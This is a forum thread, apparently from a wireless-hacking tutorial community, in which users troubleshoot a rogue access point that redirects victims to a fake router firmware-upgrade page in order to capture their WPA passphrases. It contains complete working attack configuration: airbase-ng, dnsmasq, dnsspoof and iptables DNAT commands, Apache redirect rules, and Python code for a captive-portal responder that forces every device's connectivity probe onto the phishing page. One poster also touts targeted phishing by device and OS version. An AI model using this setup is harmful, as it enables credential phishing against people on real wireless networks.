Fake AP Troubleshooting - Not Redirected to Fake Webpage

rogueap

(Johan C) #1

Hi,

So I have followed the guides in the free PDF provided by rootsh3ll to set up a fake AP to capture WPA passphrases through a fake firmware upgrade of the victim's router.

I have followed the guide in the following steps.

  1. First of all, killing all services by running airmon-ng check kill and putting my WiFi interface in monitor mode.

  2. I'm using dnsmasq in conjunction with airbase-ng, so dnsmasq is initiated with the settings according to the PDF and airbase-ng is started:

interface=at0
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

  3. I'm then allocating the IP address and so forth:

ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

  4. I'm not forwarding traffic, since I'm not planning on giving the target internet access: the router is supposed to act "offline" because of the firmware upgrade.

  5. dnsspoof is started.

  6. The AP is up and running and I connect with another computer of mine. I get connected and assigned an IP. But when I open a browser nothing happens, and I'm not redirected to the Apache server and the fake firmware-upgrade site.

Apache is of course started, and has been restarted several times, and the site works fine on the server itself on 10.0.0.1.

What might I be doing wrong? I have tried several guides, using both airbase-ng and hostapd, but the clients really don't want to be redirected to the fake site.

Running Kali Linux and Alfa AWUS036ACH adapter.

My aim is for the client to connect to the fake AP and forced to the fake site running on my apache server.


(Hardeep Singh) #2

dnsspoof must be running on at0 for airbase-ng. Please confirm.


(Johan C) #3

Hi,

Yes, dnsspoof is running on at0 and not on wlan1, which is the usual name for the interface.


(Hardeep Singh) #4

Which sites are you using to test the redirection?

My advice would be to test HTTP-based websites first to see if it works; then we can move ahead to the complicated stuff.
Try http://example.com and see if it redirects to the fake AP page.


(Johan C) #5

My goal would of course be to redirect any sort of site request to the fake update site and not a particular site.

I will try out that site and report back :wink:


(Hardeep Singh) #6

Since HSTS is implemented on the majority of the top 1000 sites (including rootsh3ll), redirection is not as simple to perform.

As an alternative you can read chapter 8 (captive portal). That can be helpful in this case.


(verapex) #7

Maybe just add this (for Android) to your default Apache config file, /etc/apache2/sites-enabled/000-default.conf, below the DocumentRoot directive:

# RedirectMatch is provided by mod_alias; the RewriteEngine directive
# needs mod_rewrite to be enabled (a2enmod rewrite) or Apache fails to start.
RewriteEngine on
RedirectMatch 302 /generate_204 http://10.0.0.1/index.html

and restart your Apache server:

service apache2 restart

(AnonymousHaxorz) #8

I had the same issue, tried solutions from other websites till 2 am before giving up. The furthest I got was to add iptables --table nat --append PREROUTING -i wlan0 -p tcp -j DNAT --to-destination 10.0.0.1:80, which is supposed to forward all traffic to 10.0.0.1:80 (my Apache server). It does indeed forward the traffic, but it sends it to 192.168.1.1 or 8.8.8.8 (not sure why it sends it to the nameserver). 192.168.1.1 is my real gateway on eth0; however, on my fake AP it's 10.0.0.1, so 192.168.1.1 obviously doesn't do anything. Help!!


(Hardeep Singh) #9

Check your dnsmasq configuration file and edit the option named nameserver from 8.8.8.8 to 10.0.0.1.

Edit: or you can simply run dnsspoof -i wlan0 along with dnsmasq to redirect all DNS queries to your local DNS server, i.e. 10.0.0.1.


(AnonymousHaxorz) #11

I tried changing the nameserver, and dnsmasq gave me errors when trying to forward the traffic, saying it was a bad server address or something like that. I also tried doing dnsspoof on wlan0 and it gave me an error saying it couldn't do that interface, I think.


(Hardeep Singh) #12

Share the things listed below:

  1. Your setup: the tools you are using for creating the fake AP, like dnsmasq + hostapd + dnsspoof.
  2. dnsmasq.conf
  3. Error output of both dnsmasq and dnsspoof
  4. Exact iptables and hostapd/airbase-ng commands being used.

(anonymoushaxorz) #13

Not in front of the computer right now, but here are the commands I used, in this exact order. Files like dnsmasq.conf and the SQL server are the same as written in the article.

ifconfig wlan0 up
iwconfig wlan0 mode monitor
iwconfig wlan0 txpower 30
airmon-ng check kill
airbase-ng -e "TEST" -c 6 wlan0    # wlan0 is the monitor-mode interface; airbase-ng needs it as its last argument
ifconfig at0 10.0.0.1 up
iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -i wlan0 -p tcp -j DNAT --to-destination 10.0.0.1:80
dnsmasq -C dnsmasq.conf -d
service apache2 start
service mysql start
dnsspoof -i at0

Will post errors when I’m back by the computer.


(Hardeep Singh) #14
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE 
iptables --append FORWARD --in-interface at0 -j ACCEPT 
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80 
iptables -t nat -A POSTROUTING -j MASQUERADE

Try these iptables commands instead and let me know if that fixes the issue for you.
Also, if you find 192.168.1.1 in dnsmasq.conf then change it to 10.0.0.1, because that's what at0 is assigned.


(anonymoushaxorz) #15

Will try and let you know, thanks.


(AnonymousHaxorz) #16

Okay, so I got a chance to try out what you suggested, but it still does not forward to the right address.

dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1
dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1
dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1
dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1

I just get a bunch of these. I tried multiple different addresses to forward to, and all give the same result, as if the FORWARD part of the iptables rules simply isn't doing its job at all.
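
The log lines in the post above already contain the diagnosis: every query is "forwarded" to 8.8.8.8 and then to 192.168.1.1 (the upstream from /etc/resolv.conf), so the client learns the real address and has no reason to contact 10.0.0.1. The Python below is an added example, not code from the thread or from the rootsh3ll material: it parses dnsmasq's -d output, separates answers given locally with the portal address from queries forwarded upstream, and flags the OS captive-portal probe names that escaped. The sample log is constructed from the lines in the post plus two made-up lines; the line formats matched (query[A] ... from, forwarded ... to, config/cached/reply ... is) are the ones dnsmasq itself writes. The captive-portal hostnames are the documented vendor probe names.

```python
"""Triage dnsmasq debug output (dnsmasq -d) from a rogue-AP setup.

For clients to land on the portal, dnsmasq on the AP must answer every
query with the portal address itself. A line such as
    dnsmasq: forwarded captive.apple.com to 8.8.8.8
means the query left the box (a server= line or an /etc/resolv.conf
upstream), the client got the real address, and it will never hit the
portal. This script summarises local answers vs. upstream forwards per
name, lists the upstreams consulted, and flags escaped probe names.
"""
import re
from collections import Counter, defaultdict

# Constructed sample: the lines posted in the thread, plus one name that
# was resolved for real and one that a correct config answered locally.
SAMPLE_LOG = """\
dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1
dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1
dnsmasq: query[A] connectivitycheck.gstatic.com from 10.0.0.121
dnsmasq: forwarded connectivitycheck.gstatic.com to 8.8.8.8
dnsmasq: reply connectivitycheck.gstatic.com is 142.250.74.99
dnsmasq: query[A] www.msftconnecttest.com from 10.0.0.122
dnsmasq: config www.msftconnecttest.com is 10.0.0.1
"""

# Hostnames the major OSes and Firefox use to detect a captive portal.
PROBE_NAMES = {
    "captive.apple.com", "connectivitycheck.gstatic.com",
    "clients3.google.com", "www.msftconnecttest.com",
    "www.msftncsi.com", "detectportal.firefox.com",
}

QUERY_RE = re.compile(r"query\[(?P<qtype>\w+)\] (?P<name>\S+) from (?P<client>\S+)")
FORWARD_RE = re.compile(r"forwarded (?P<name>\S+) to (?P<upstream>\S+)")
ANSWER_RE = re.compile(r"(?:config|/etc/hosts|cached|reply) (?P<name>\S+) is (?P<addr>\S+)")


def triage(log_text, portal_ip):
    """Return (per-name stats, Counter of upstream servers consulted)."""
    stats = defaultdict(lambda: {"queries": 0, "local": 0, "real": 0,
                                 "forwarded": 0, "clients": set()})
    upstreams = Counter()
    for line in log_text.splitlines():
        if m := QUERY_RE.search(line):
            s = stats[m["name"]]
            s["queries"] += 1
            s["clients"].add(m["client"])
        elif m := FORWARD_RE.search(line):
            stats[m["name"]]["forwarded"] += 1
            upstreams[m["upstream"]] += 1
        elif m := ANSWER_RE.search(line):
            # An answer equal to the portal IP is what we want; anything
            # else means the client learned the real address.
            key = "local" if m["addr"] == portal_ip else "real"
            stats[m["name"]][key] += 1
    return stats, upstreams


def leaking_names(stats):
    """Names forwarded upstream and never answered with the portal IP."""
    return sorted(n for n, s in stats.items() if s["forwarded"] and not s["local"])


def leaking_probes(stats):
    """Captive-portal probe names among the leaking ones: these are why
    no sign-in sheet appears on the client."""
    return sorted(n for n in leaking_names(stats) if n in PROBE_NAMES)


def report(log_text, portal_ip):
    stats, upstreams = triage(log_text, portal_ip)
    lines = []
    for name in sorted(stats):
        s = stats[name]
        lines.append(f"{name}: {s['queries']} queries, {s['local']} portal answers, "
                     f"{s['forwarded']} forwards, {s['real']} real answers, "
                     f"clients {sorted(s['clients'])}")
    if upstreams:
        lines.append("upstreams consulted: "
                     + ", ".join(f"{u} ({n})" for u, n in upstreams.most_common()))
        lines.append("FAIL: queries are leaving the AP; drop server= lines, add no-resolv "
                     f"and answer every name locally with address=/#/{portal_ip}")
    if probes := leaking_probes(stats):
        lines.append("captive-portal probes that escaped: " + ", ".join(probes))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG, "10.0.0.1"))
```

Run it against a captured log (dnsmasq -C dnsmasq.conf -d 2>&1 | tee dnsmasq.log). Any upstream in the output means dnsmasq is resolving for real: with the posted config, server=8.8.8.8 plus the 192.168.1.1 read from /etc/resolv.conf. Making dnsmasq authoritative for every name (address=/#/10.0.0.1 together with no-resolv) removes the race with dnsspoof entirely, since no query ever leaves the AP.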


(Hardeep Singh) #17

Are you testing an Android configuration in Apache with an Apple device? That's never going to pop up the splash page.

For dnsmasq, use this configuration and leave the older one.

dnsmasq:

interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=127.0.0.1
log-queries
log-dhcp 
listen-address=127.0.0.1

For the Apache configuration, edit the 000-default.conf file in /etc/apache2/sites-available/ and add this: 000-default.conf (1.7 KB)

You may edit the DocumentRoot directive as you want. This configuration will work for the majority of Android, iOS and Windows devices to trigger the captive portal.

Edit:

NOTE: Apache uses mod_rewrite to rewrite URLs on the fly. To enable the Rewrite Engine module in Apache, run sudo a2enmod rewrite
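
Posts #7 and #17 rely on the same mechanism: each OS fetches a fixed probe URL over plain HTTP and opens its sign-in sheet when the reply is not the one it expects. The script below is an added example, not the Apache configuration from the thread or the rootsh3ll PDF's code: it implements that decision logic with Python's http.server so the rules can be read and tested, and logs which OS probe arrived. It assumes the portal page is served at http://10.0.0.1/index.html (the address used in the thread) and that every DNS name already resolves to 10.0.0.1; the probe hosts and paths are the documented vendor ones, listed with the healthy reply each OS expects.

```python
"""Captive-portal probe responder for a rogue AP.

Every major OS decides whether it is behind a captive portal by fetching
a fixed probe URL over plain HTTP and comparing the reply with a known
"healthy" answer. Replying with anything else makes the OS open its
sign-in sheet. This module classifies the probe, never returns the
healthy answer, and sends the client to the portal page instead.

Assumptions (not from the thread): the portal is served by this script
at PORTAL_URL, and all DNS names already resolve to PORTAL_HOST.
"""
import sys
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

PORTAL_HOST = "10.0.0.1"            # the at0 address used in the thread
PORTAL_PATH = "/index.html"
PORTAL_URL = f"http://{PORTAL_HOST}{PORTAL_PATH}"
PORTAL_HTML = b"<html><body><h1>Network sign-in</h1></body></html>"  # placeholder page

# (label, matcher) -> which OS sent the probe. The comment gives the
# reply that OS expects on an open network; we never send it.
PROBES = [
    ("android", lambda h, p: p.startswith("/generate_204")),          # expects 204 No Content
    ("ios", lambda h, p: h == "captive.apple.com"                     # expects HTML whose
            or p == "/hotspot-detect.html"),                           #   body says "Success"
    ("windows", lambda h, p: h in ("www.msftconnecttest.com",         # expects "Microsoft Connect Test"
                                   "www.msftncsi.com")),               #   or "Microsoft NCSI"
    ("firefox", lambda h, p: h == "detectportal.firefox.com"),        # expects "success"
]


def _hostname(host_header):
    """Strip an optional :port from the Host header and normalise case."""
    return host_header.split(":", 1)[0].strip().lower()


def classify_probe(host, path):
    """Return 'android' | 'ios' | 'windows' | 'firefox' | 'browser'."""
    h = _hostname(host)
    for label, match in PROBES:
        if match(h, path):
            return label
    return "browser"


def portal_response(host, path):
    """Return (status, headers, body) for one request reaching the AP.

    Only the portal page itself is served with 200. Every probe and every
    other URL gets a 302 to the portal: on /generate_204 the 302 alone
    trips Android; iOS, Windows and Firefox follow it, see a body that is
    not their expected text, and open the sheet. Cache-Control: no-store
    keeps the client from caching either reply and skipping the portal
    on its next probe.
    """
    if _hostname(host) == PORTAL_HOST and path == PORTAL_PATH:
        return 200, {"Content-Type": "text/html", "Cache-Control": "no-store"}, PORTAL_HTML
    return 302, {"Location": PORTAL_URL, "Cache-Control": "no-store"}, b""


class PortalHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "")
        status, headers, body = portal_response(host, self.path)
        self.log_message("%s probe from %s for http://%s%s -> %d",
                         classify_probe(host, self.path), self.client_address[0],
                         host, self.path, status)
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def main(argv):
    bind = argv[1] if len(argv) > 1 else PORTAL_HOST
    port = int(argv[2]) if len(argv) > 2 else 80   # binding port 80 needs root
    ThreadingHTTPServer((bind, port), PortalHandler).serve_forever()


if __name__ == "__main__":
    main(sys.argv)
```

Run it as root on the AP in place of Apache (python3 portal.py 10.0.0.1 80) and watch the log: a connected phone produces one android/ios/windows line within a few seconds, before the user opens anything. This works because the probes are plain HTTP. A name typed into a browser that is on the HSTS list (post #6) is fetched over TLS instead, and the AP cannot present a valid certificate for it, so no redirect is possible there; the probe URLs are the reliable entry point.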


(AnonymousHaxorz) #18

Modified the two files and got this error running dnsmasq

dnsmasq: warning: interface wlan0 does not currently exist
dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h
dnsmasq: ignoring nameserver 127.0.0.1 - local interface
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 192.168.1.1#53

and this error starting the apache2 service (in journalctl -xe)

-- Unit apache2.service has begun starting up.
Jan 17 22:39:55 Kali-Desktop apachectl[2869]: AH00526: Syntax error on line 15 of /etc/apache2/sites-enabled/000-default.conf:
Jan 17 22:39:55 Kali-Desktop apachectl[2869]: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server co
Jan 17 22:39:55 Kali-Desktop apachectl[2869]: Action 'start' failed.
Jan 17 22:39:55 Kali-Desktop apachectl[2869]: The Apache error log may have more information.
Jan 17 22:39:55 Kali-Desktop systemd[1]: apache2.service: Control process exited, code=exited status=1
Jan 17 22:39:55 Kali-Desktop systemd[1]: apache2.service: Failed with result 'exit-code'.
Jan 17 22:39:55 Kali-Desktop systemd[1]: Failed to start The Apache HTTP Server.
-- Subject: Unit apache2.service has failed

(Hardeep Singh) #19

For dnsmasq, edit the conf file and change wlan0 to at0 after running ifconfig at0 10.0.0.1 up.

For Apache, read the third line. It says "Invalid command 'RewriteEngine'".

Running sudo a2enmod rewrite will enable the Apache Rewrite Engine, or "mod_rewrite", module.
Restart Apache to apply the changes. Things should work out nicely.


(AnonymousHaxorz) #20

Got it working, for the most part that is. It redirects you to the server now; however, it only does that for one device, one time, and then it stops working. It sends you to the fake page for the first website you visit in the browser, and I still can't trigger the captive portal. It also doesn't work at all on iPhones, with a 100% failure rate on them.


(Hardeep Singh) #21

I disagree. It works absolutely fine and 100% of the time on my iOS devices.

Device details:

  • Device 1 - iPhone 7 / iOS 12.1.X
  • Device 2 - iPhone 6s / iOS 11 and iOS 12 Both

Here’s the recording of my iPhone 7 on iOS 12.1 with the captive portal triggered.

It works all of the time and I can even create targeted phishing campaigns on this using apache mod_rewrite. Targeting to the level of

  • Device version, and/or
  • iOS versions

I would like to see your device stack for both Android and Apple devices.